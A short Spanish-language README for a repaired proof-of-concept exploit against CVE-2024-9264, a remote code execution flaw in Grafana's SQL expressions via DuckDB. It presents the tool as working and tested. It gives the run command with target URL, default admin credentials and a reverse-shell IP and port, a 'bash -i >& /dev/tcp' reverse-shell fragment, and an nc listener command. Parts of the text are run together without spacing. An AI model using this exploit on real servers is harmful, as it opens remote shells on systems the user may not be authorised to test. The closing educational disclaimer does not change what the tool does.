
Esta es una versión corregida del exploit de prueba de concepto para CVE-2024-9264, una vulnerabilidad crítica de ejecución remota de código en Grafana (a través de expresiones SQL y DuckDB).
🔗 Aviso original: Grafana Security Release
❌ PoC original: Roto debido a errores de sintaxis y uso incorrecto de write_file()
✅ Esta versión funciona, probada en una instancia vulnerable de Grafana 11.0.0.
writefile() en lugar de write_file() (función de DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
Luego escucha con:
nc -lvnp 4444
Este proyecto es solo con fines educativos.
No lo uses contra objetivos que no tengas permiso de probar.
Modificado y validado por Exerr — PoC original por z3k0sec.